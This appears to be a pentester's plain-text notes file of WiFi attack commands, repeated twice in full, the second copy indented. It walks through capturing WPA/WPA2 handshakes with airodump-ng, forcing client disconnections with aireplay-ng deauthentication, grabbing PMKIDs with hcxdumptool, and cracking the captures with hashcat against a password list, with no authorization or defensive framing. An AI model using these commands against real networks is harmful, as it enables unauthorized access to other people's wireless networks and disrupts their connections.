hoodoer/wifiAttacks.txt

## wifiAttacks.txt
airmon-ng check kill

https://forums.hak5.org/topic/37247-capturing-wpawpa2-passwords-with-the-nanotetra/

On nano, or other wifi access point monitoring:

airmon-ng start wlan1
airodump-ng -w PacketCapture wlan1mon

(Then just do near the AP you're wanting to crack and wait for someone to connect to it.)

(You could speed this up with a deauth attack as mentioned above.)

Once someone has connected to the network, you might want to make sure it was piked up by the nano in case you were too far away or something.

To do this, stop the airodump. (Control + C) Then run aircrack-ng PacketCapture-01.cap (It will give you a list of networks. If it says you have handshakes beside it, you're good to go. if not, try again.)

You'll need to convert your PacketCapture to a different format using the command
!!!SKIP THIS, USE TOOLS BELOW!!!
aircrack-ng -J Capture.hccap PacketCapture-01.cap
Now go how, take the Capture.hccap file off of your pineapple and store it somewhere on your computer.

You'll need to get a large password dictionary.

Now that you have all the information recorded in the Capture file, you'll need to crack it.

!!!THIS HERE!!!!
Ok, get ready for hashcat:
root@kaliboxen:~/tools/hashcat-utils/src# ./cap2hccapx.bin PacketCapture-01.cap output.hccapx


drews-mbp:hashcat drewk$ ./hashcat -m 2500 output.hccapx  ~/VM\ Share/PasswordLists/rockyou.txt


************
https://forums.hak5.org/topic/44213-pmkid-attack-on-wifi-pineapples/
https://miloserdov.org/?p=2100
https://www.bitcrack.net/the-pmkid-attack/


Probably works best of the Alfa radio

PMKID:
Can run this against a wlanXmon device

hcxdumptool -o test.pcapng -i wlan2 --enable_status 3

To go completely passive on the hcxdump, add these flags:
--disable_ap_attacks --disable_deauthentications --disable_client_attacks --disable_active_scan

To target a specific AP (from the awesome bitcrack article above):
We now run HCXDumpTool again, using the filter switches and watch as it attacks our target network, waiting for a PMKID.
The switches are:
–filterlist= To tell the tool which file contains the Mac Addresses
–filtermode=2 Tells the tool that these Mac Addresses in –filterlist are our targets, ignore anything else:


hcxpcaptool -z test.16800 test.pcapng

hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'


*********************

General tricks:

# put your network device into monitor mode
airmon-ng start wlan0
# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0
# start listening for the handshake
airodump-ng -c 6 — bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0
# optionally deauth a connected client to force a handshake
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0
	airmon-ng check kill

	https://forums.hak5.org/topic/37247-capturing-wpawpa2-passwords-with-the-nanotetra/

	On nano, or other wifi access point monitoring:

	airmon-ng start wlan1
	airodump-ng -w PacketCapture wlan1mon

	(Then just do near the AP you're wanting to crack and wait for someone to connect to it.)

	(You could speed this up with a deauth attack as mentioned above.)

	Once someone has connected to the network, you might want to make sure it was piked up by the nano in case you were too far away or something.

	To do this, stop the airodump. (Control + C) Then run aircrack-ng PacketCapture-01.cap (It will give you a list of networks. If it says you have handshakes beside it, you're good to go. if not, try again.)

	You'll need to convert your PacketCapture to a different format using the command
	!!!SKIP THIS, USE TOOLS BELOW!!!
	aircrack-ng -J Capture.hccap PacketCapture-01.cap
	Now go how, take the Capture.hccap file off of your pineapple and store it somewhere on your computer.

	You'll need to get a large password dictionary.

	Now that you have all the information recorded in the Capture file, you'll need to crack it.

	!!!THIS HERE!!!!
	Ok, get ready for hashcat:
	root@kaliboxen:~/tools/hashcat-utils/src# ./cap2hccapx.bin PacketCapture-01.cap output.hccapx


	drews-mbp:hashcat drewk$ ./hashcat -m 2500 output.hccapx ~/VM\ Share/PasswordLists/rockyou.txt



	************
	https://forums.hak5.org/topic/44213-pmkid-attack-on-wifi-pineapples/
	https://miloserdov.org/?p=2100
	https://www.bitcrack.net/the-pmkid-attack/


	Probably works best of the Alfa radio

	PMKID:
	Can run this against a wlanXmon device

	hcxdumptool -o test.pcapng -i wlan2 --enable_status 3

	To go completely passive on the hcxdump, add these flags:
	--disable_ap_attacks --disable_deauthentications --disable_client_attacks --disable_active_scan

	To target a specific AP (from the awesome bitcrack article above):
	We now run HCXDumpTool again, using the filter switches and watch as it attacks our target network, waiting for a PMKID.
	The switches are:
	–filterlist= To tell the tool which file contains the Mac Addresses
	–filtermode=2 Tells the tool that these Mac Addresses in –filterlist are our targets, ignore anything else:


	hcxpcaptool -z test.16800 test.pcapng

	hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'



	*********************

	General tricks:

	# put your network device into monitor mode
	airmon-ng start wlan0
	# listen for all nearby beacon frames to get target BSSID and channel
	airodump-ng mon0
	# start listening for the handshake
	airodump-ng -c 6 — bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0
	# optionally deauth a connected client to force a handshake
	aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0